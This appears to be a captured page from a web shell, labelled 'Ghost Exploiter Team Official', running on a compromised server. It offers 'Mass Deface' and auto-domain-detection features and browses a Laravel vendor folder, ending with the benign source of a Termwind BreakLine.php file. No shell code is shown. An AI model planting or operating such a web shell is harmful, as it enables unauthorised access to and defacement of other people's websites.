Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
nunomaduro
/
termwind
/
src
/
Components
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
Anchor.php
0.101KB
edt
ren
BreakLine.php
0.497KB
edt
ren
Dd.php
0.159KB
edt
ren
Div.php
0.152KB
edt
ren
Dl.php
0.151KB
edt
ren
Dt.php
0.164KB
edt
ren
Element.php
3.231KB
edt
ren
Hr.php
0.163KB
edt
ren
Li.php
0.151KB
edt
ren
Ol.php
0.167KB
edt
ren
Paragraph.php
0.166KB
edt
ren
Raw.php
0.322KB
edt
ren
Span.php
0.109KB
edt
ren
Ul.php
0.164KB
edt
ren
<?php declare(strict_types=1); namespace Termwind\Components; final class BreakLine extends Element { /** * Get the string representation of the element. */ public function toString(): string { $display = $this->styles->getProperties()['styles']['display'] ?? 'inline'; if ($display === 'hidden') { return ''; } if ($display === 'block') { return parent::toString(); } return parent::toString()."\r"; } }
<=Back
Liking